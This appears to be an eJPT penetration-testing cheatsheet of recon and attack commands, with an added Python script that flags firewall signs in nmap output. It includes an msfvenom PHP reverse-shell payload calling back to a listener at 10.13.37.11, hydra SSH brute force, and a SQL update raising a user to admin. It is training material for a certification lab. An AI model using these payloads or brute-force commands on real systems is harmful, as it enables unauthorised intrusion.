Checking Routes & Adding Manual Routes
route
ip route
route add -net 192.168.10.0 netmask 255.255.255.0 gw 10.175.3.1
ip route add <subnet> via <gateway or router address>
for example:
ip route add 192.168.222.0/24 via 10.172.24.1 # Here 10.172.24.1 is the address of the gateway for subnet 192.168.222.0/24
nslookup mysite.com
dig mysite.com
ip route # Checking defined routes in linux
route # Checking defined routes in linux
route print # Checking defined routes in windows
nmap -sV -sC -T4 <ip> -oN out.nmap
sudo nmap -sn 172.16.64.0/24 # Host discovery (ping sweep) on the subnet
fping -a -g 172.16.64.0/24 2>/dev/null
nmap -sV -n -v -Pn -p- -T4 -iL ips.txt -A --open
If an nmap TCP scan identifies a well-known service, such as a web server, but cannot detect its version, a firewall may be in place.
For example:
PORT STATE SERVICE REASON VERSION
80/tcp open http? syn-ack ttl 64
Another example:
80/tcp open tcpwrapped
“tcpwrapped” means the TCP handshake was completed, but the remote host closed the connection without receiving any data.
These are both indicators that a firewall is blocking our scan with the target!
Tips:
- Use "--reason" to see why a port is marked open or closed
- If a "RST" packet is received, then something prevented the connection - probably a firewall!
nc -v www.abc.com 80 # After connecting, type the two lines below and press enter twice to get the HTTP response
GET / HTTP/1.1
Host: www.abc.com
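The indicators above can be checked mechanically. The following Python script is an added example, not part of the cheatsheet: it parses the port table of nmap normal output (run with --reason) and flags the three signs discussed here, a guessed service name ending in "?", a "tcpwrapped" service, and a "filtered" state. The scan output embedded in the script is a constructed sample; the host 192.0.2.10, the banners and the port list are assumptions.

```python
import re

# One port line of nmap normal output, with or without --reason:
#   PORT     STATE    SERVICE    REASON         VERSION
#   80/tcp   open     http?      syn-ack ttl 64
PORT_RE = re.compile(
    r"^(?P<port>\d+)/(?P<proto>tcp|udp)\s+(?P<state>\S+)\s+(?P<service>\S+)"
    r"(?:\s+(?P<reason>syn-ack|reset|no-response|conn-refused|udp-response|port-unreach)"
    r"(?:\s+ttl\s+\d+)?)?"
    r"(?:\s+(?P<version>.*))?$"
)

# Constructed sample output (not a real scan). Two ports were "detected"
# but not fingerprinted, one is filtered, one is a plain closed port.
SAMPLE_NMAP_OUTPUT = """\
# Nmap scan initiated (constructed sample, not a real scan)
Nmap scan report for 192.0.2.10
Host is up (0.0012s latency).
PORT     STATE    SERVICE    REASON         VERSION
22/tcp   open     ssh        syn-ack ttl 64 OpenSSH 8.9p1 Ubuntu 3
80/tcp   open     http?      syn-ack ttl 64
443/tcp  open     tcpwrapped syn-ack ttl 64
3306/tcp filtered mysql      no-response
8080/tcp closed   http-proxy reset ttl 64
"""


def parse_port_lines(text):
    """Return one dict per port line; header, host and comment lines are skipped."""
    ports = []
    for line in text.splitlines():
        m = PORT_RE.match(line.strip())
        if m:
            entry = m.groupdict()
            entry["port"] = int(entry["port"])
            ports.append(entry)
    return ports


def firewall_indicators(ports):
    """Return (port, explanation) pairs for ports whose result suggests filtering."""
    findings = []
    for p in ports:
        tag = f"{p['port']}/{p['proto']}"
        if p["service"].endswith("?"):
            # nmap saw the port open but its version probes got no usable reply
            findings.append((tag, "service guessed only: version probes unanswered, possibly filtered or proxied"))
        elif p["service"] == "tcpwrapped":
            # handshake completed, connection closed before any data was exchanged
            findings.append((tag, "handshake completed but connection closed before data: TCP wrapper or firewall"))
        elif p["state"] == "filtered":
            # no SYN/ACK and no RST: something in the path dropped the probe
            findings.append((tag, f"filtered ({p['reason']}): packet filter in the path"))
    return findings


if __name__ == "__main__":
    for port, why in firewall_indicators(parse_port_lines(SAMPLE_NMAP_OUTPUT)):
        print(f"{port}: {why}")
```

Feed it a real `-oN` file instead of the embedded sample to triage which ports deserve a closer look; a closed port with reason "reset" is normal behaviour and is deliberately not flagged.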
openssl s_client -connect hack.me 443 # Establish ssl connection
gobuster dir -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -u http://172.16.64.140/project/backup -U admin -P admin
ipconfig /all # windows
ifconfig # *nix OSs
ip addr # linux
arp -a # Windows
arp # *nix OSs
ip neighbour # Linux
netstat -ano # Windows
netstat -tunp # linux
enum4linux -a <ip> # Enumerating using enum4linux tool
smbclient -L //<target IP> -N # Checking for available shares
smbclient //<target IP>/IPC$ -N # Connecting to a share
nmap -p445 --script=smb-vuln-* <IP> -v # This will run all the smb-vuln scripts, if you want to run only few scripts then you can check other available scripts in /usr/share/nmap/scripts
Try to login without a username or password:
$ smbclient //ip/share -N
Login to MySQL with password
$ mysql --user=root --port=13306 -p -h 172.16.64.81
> SHOW databases;
> SHOW TABLES FROM <database>;
> USE <database>;
> SELECT * FROM <table>;
Change table entry values
# Add the user tracking1 to the "adm" group
> update users set adm="yes" where username="tracking1";
msfvenom -p php/meterpreter_reverse_tcp lhost=10.13.37.11 lport=9001 -o msf.php
use exploit/multi/handler
set lhost 10.13.37.11
set payload php/meterpreter_reverse_tcp
set lport 9001
run
portfwd add -l 2222 -p 22 -r 172.16.50.222
john --wordlist=<wordlist> <file to crack>
hydra -l <username> -P <path to wordlist> <IP> ssh
hydra -L <path to username wordlist> -P <path to password wordlist> <IP> ssh
http.request.method == "GET" # Wireshark display filter; use == "POST" for POST requests
eJPT-Cheatsheet/eJPT Cheatsheet.md at main · atinfosec/eJPT-Cheatsheet
https://www.notion.so/CTF-2021-67649903f2f24e41b3625f69390b3be5